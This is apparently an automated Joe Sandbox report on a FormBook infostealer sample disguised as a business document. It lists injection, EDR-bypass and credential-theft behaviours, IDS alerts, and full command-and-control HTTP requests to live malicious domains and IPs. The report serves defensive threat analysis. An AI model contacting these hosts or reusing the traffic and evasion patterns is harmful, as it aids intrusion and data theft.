Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe

Overview

General Information

Sample name:ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe
Analysis ID:1572660
MD5:464587c795efba3d6a77d78ab9f3de32
SHA1:f2ce67c18f57c7919d951b640c30298bab731141
SHA256:60f63f5446e6a149513c50ac17e7165bb6c52006eac6acd825a142d55a2ae14f
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Xwizard DLL Sideloading
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64native
  • ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe (PID: 6560 cmdline: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe" MD5: 464587C795EFBA3D6A77D78AB9F3DE32)
    • svchost.exe (PID: 5412 cmdline: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • EIyKLgVzlk.exe (PID: 7544 cmdline: "C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • xwizard.exe (PID: 1844 cmdline: "C:\Windows\SysWOW64\xwizard.exe" MD5: 8581F29C5F84B72C053DBCC5372C5DB6)
          • EIyKLgVzlk.exe (PID: 7508 cmdline: "C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 32 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Xwizard DLL Sideloading
            Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xwizard.exe", CommandLine: "C:\Windows\SysWOW64\xwizard.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xwizard.exe, NewProcessName: C:\Windows\SysWOW64\xwizard.exe, OriginalFileName: C:\Windows\SysWOW64\xwizard.exe, ParentCommandLine: "C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe" , ParentImage: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe, ParentProcessId: 7544, ParentProcessName: EIyKLgVzlk.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xwizard.exe", ProcessId: 1844, ProcessName: xwizard.exe
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", CommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", CommandLine|base64offset|contains: 8, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", ParentImage: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, ParentProcessId: 6560, ParentProcessName: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, ProcessCommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", ProcessId: 5412, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", CommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", CommandLine|base64offset|contains: 8, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", ParentImage: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, ParentProcessId: 6560, ParentProcessName: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, ProcessCommandLine: "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe", ProcessId: 5412, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-10T18:48:27.548312+010028554651A Network Trojan was detected192.168.11.2049755162.251.95.6280TCP
            2024-12-10T18:48:51.684040+010028554651A Network Trojan was detected192.168.11.204975984.32.84.3280TCP
            2024-12-10T18:49:06.152353+010028554651A Network Trojan was detected192.168.11.2049763104.21.64.20880TCP
            2024-12-10T18:49:19.805288+010028554651A Network Trojan was detected192.168.11.2049767199.59.243.22780TCP
            2024-12-10T18:49:33.220855+010028554651A Network Trojan was detected192.168.11.2049771199.59.243.22780TCP
            2024-12-10T18:49:47.014958+010028554651A Network Trojan was detected192.168.11.2049775209.74.79.4180TCP
            2024-12-10T18:50:01.276604+010028554651A Network Trojan was detected192.168.11.2049779172.67.128.10980TCP
            2024-12-10T18:50:16.356830+010028554651A Network Trojan was detected192.168.11.204978347.83.1.9080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-10T18:47:36.565238+010028554641A Network Trojan was detected192.168.11.204975884.32.84.3280TCP
            2024-12-10T18:47:36.565238+010028554641A Network Trojan was detected192.168.11.204975684.32.84.3280TCP
            2024-12-10T18:47:36.565238+010028554641A Network Trojan was detected192.168.11.204975784.32.84.3280TCP
            2024-12-10T18:48:57.993871+010028554641A Network Trojan was detected192.168.11.2049760104.21.64.20880TCP
            2024-12-10T18:49:00.644650+010028554641A Network Trojan was detected192.168.11.2049761104.21.64.20880TCP
            2024-12-10T18:49:03.537440+010028554641A Network Trojan was detected192.168.11.2049762104.21.64.20880TCP
            2024-12-10T18:49:11.680216+010028554641A Network Trojan was detected192.168.11.2049764199.59.243.22780TCP
            2024-12-10T18:49:14.391627+010028554641A Network Trojan was detected192.168.11.2049765199.59.243.22780TCP
            2024-12-10T18:49:17.087577+010028554641A Network Trojan was detected192.168.11.2049766199.59.243.22780TCP
            2024-12-10T18:49:25.252644+010028554641A Network Trojan was detected192.168.11.2049768199.59.243.22780TCP
            2024-12-10T18:49:27.908725+010028554641A Network Trojan was detected192.168.11.2049769199.59.243.22780TCP
            2024-12-10T18:49:30.565792+010028554641A Network Trojan was detected192.168.11.2049770199.59.243.22780TCP
            2024-12-10T18:49:38.853215+010028554641A Network Trojan was detected192.168.11.2049772209.74.79.4180TCP
            2024-12-10T18:49:41.539486+010028554641A Network Trojan was detected192.168.11.2049773209.74.79.4180TCP
            2024-12-10T18:49:44.288907+010028554641A Network Trojan was detected192.168.11.2049774209.74.79.4180TCP
            2024-12-10T18:49:53.406218+010028554641A Network Trojan was detected192.168.11.2049776172.67.128.10980TCP
            2024-12-10T18:49:56.072312+010028554641A Network Trojan was detected192.168.11.2049777172.67.128.10980TCP
            2024-12-10T18:49:58.877370+010028554641A Network Trojan was detected192.168.11.2049778172.67.128.10980TCP
            2024-12-10T18:50:08.290020+010028554641A Network Trojan was detected192.168.11.204978047.83.1.9080TCP
            2024-12-10T18:50:10.678387+010028554641A Network Trojan was detected192.168.11.204978147.83.1.9080TCP
            2024-12-10T18:50:13.527999+010028554641A Network Trojan was detected192.168.11.204978247.83.1.9080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.telepzow.fit/oizn/Avira URL Cloud: Label: phishing
            Source: http://www.telepzow.fit/oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA=Avira URL Cloud: Label: phishing
            Multi AV Scanner detection for submitted file
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeReversingLabs: Detection: 27%
            Yara detected FormBook
            Source: Yara matchFile source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Machine Learning detection for sample
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeJoe Sandbox ML: detected
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EIyKLgVzlk.exe, 00000003.00000002.65192008768.000000000028E000.00000002.00000001.01000000.00000004.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65192012128.000000000028E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63941655319.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945048375.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64142076906.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64144938624.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64238602589.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.00000000050BD000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64235438172.0000000004C27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63941655319.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945048375.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64142076906.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64144938624.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64238602589.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.00000000050BD000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64235438172.0000000004C27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000003.64203202096.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203426451.0000000003027000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203370841.000000000301A000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193076709.0000000000D67000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: xwizard.exe, 00000004.00000002.65195625577.00000000055BC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000000.64301811378.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.64526000051.00000000274BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: xwizard.exe, 00000004.00000002.65195625577.00000000055BC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000000.64301811378.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.64526000051.00000000274BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000003.64203202096.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203426451.0000000003027000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203370841.000000000301A000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193076709.0000000000D67000.00000004.00000020.00020000.00000000.sdmp

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 104.21.64.208:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 104.21.64.208:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 209.74.79.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 209.74.79.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 104.21.64.208:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49759 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49755 -> 162.251.95.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 209.74.79.41:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49775 -> 209.74.79.41:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 172.67.128.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 172.67.128.109:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49771 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 104.21.64.208:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49783 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49779 -> 172.67.128.109:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 172.67.128.109:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49767 -> 199.59.243.227:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49780 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 84.32.84.32:80
            Source: Joe Sandbox ViewIP Address: 104.21.64.208 104.21.64.208
            Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /jv64/?QT=0rgj4Y9sgnjazUN8mpbMdGhoFe+HkDbNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7y+Y5ieOqpPsPHRlC6dNFB2EQ+kIpm+R3QUE=&LLp=-2JPqdjXxxH4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.y6h6kn.topUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: global trafficHTTP traffic detected: GET /z4qr/?QT=1ZZgvIaiKHhduep+YaBDSgnAwH9SiWnEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jtTWbac3F9TEassXJax+dUsBKSmbq0EscsQY=&LLp=-2JPqdjXxxH4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.thesnusgang.funUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: global trafficHTTP traffic detected: GET /oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.telepzow.fitUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: global trafficHTTP traffic detected: GET /yeky/?QT=7P22LBHaa1jf6nBJoZKhVMfAW6E6enltUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadCya5VvUUehVECqXYJH1JxrXGdxyqb1WHUVg=&LLp=-2JPqdjXxxH4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dnft.immoUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: global trafficHTTP traffic detected: GET /0sq9/?LLp=-2JPqdjXxxH4&QT=wDssjmzaov4c9lpHi4/A+j8N6f+vZebPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdxGSDI/O/AvGAu226L0N94rOkpbvikda6PNY= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.deadshoy.techUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: global trafficHTTP traffic detected: GET /qp01/?QT=ZPOD+BqQao/QyIxulVjbDCVFLb7RjhwyuULyKVNAiV+MeP7iuxHdlS3JdohyzquBitQvx+Sc1DnyV4OJvwDeoSt18py19YLRfjflEWoNZD6QwIJxPVF50MQ=&LLp=-2JPqdjXxxH4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.freshteps.lifeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
            Source: xwizard.exe, 00000004.00000002.65196596495.0000000008013000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_override":{"applications":[{"applied_policy":"OptIn","domain":"youtube.com","path_exclude":["/shorts","/kids"],"subdomain_exclude":["tv.youtube.com","studio.youtube.com","vr.youtube.com"]}],"policies":[{"name":"OptIn","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"app
            Source: global trafficDNS traffic detected: DNS query: www.y6h6kn.top
            Source: global trafficDNS traffic detected: DNS query: www.thesnusgang.fun
            Source: global trafficDNS traffic detected: DNS query: www.telepzow.fit
            Source: global trafficDNS traffic detected: DNS query: www.dnft.immo
            Source: global trafficDNS traffic detected: DNS query: www.deadshoy.tech
            Source: global trafficDNS traffic detected: DNS query: www.freshteps.life
            Source: global trafficDNS traffic detected: DNS query: www.cifasnc.info
            Source: global trafficDNS traffic detected: DNS query: www.cruycq.info
